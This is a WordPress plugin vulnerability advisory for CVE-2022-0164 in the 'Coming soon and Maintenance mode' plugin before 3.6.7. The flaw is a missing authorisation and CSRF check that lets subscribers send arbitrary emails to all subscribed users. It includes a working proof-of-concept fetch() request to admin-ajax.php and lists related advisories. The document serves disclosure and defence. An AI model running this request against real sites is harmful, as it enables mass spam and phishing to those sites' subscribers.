Coming soon and Maintenance mode < 3.6.7 – Subscriber+ Arbitrary Email Sending to Subscribed Users | CVE 2022-0164 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in its coming_soon_send_mail AJAX action, allowing any authenticated users, with a role as low as subscriber to send arbitrary emails to all subscribed users

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "action=coming_soon_send_mail&massage_title=title&massage_description=description&massage_from_name=from&massage_from_mail=from@example.com",
  "method": "POST",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

coming-soon-page

Fixed in 3.6.7

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2655973

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

942535f9-73bf-4467-872a-20075f03bc51

Timeline

Publicly Published

2022-01-24 (about 3 years ago)

Added

2022-01-24 (about 3 years ago)

Last Updated

2023-07-24 (about 2 years ago)

Other

Published

Title

Published

2025-12-20

Title

Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX < 5.0.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure

Published

2023-11-28

Title

WP Cleanfix < 5.7.0 - Subscriber+ Post/Comment/Post Meta Content Replacement

Published

2023-12-05

Title

Webflow Pages < 1.1.0 - Missing Authorization

Published

2025-05-07

Title

Bulk Featured Image <= 1.2.4 - Missing Authorization

Published

2023-09-29

Title

Unyson <= 2.7.28 - Missing Authorization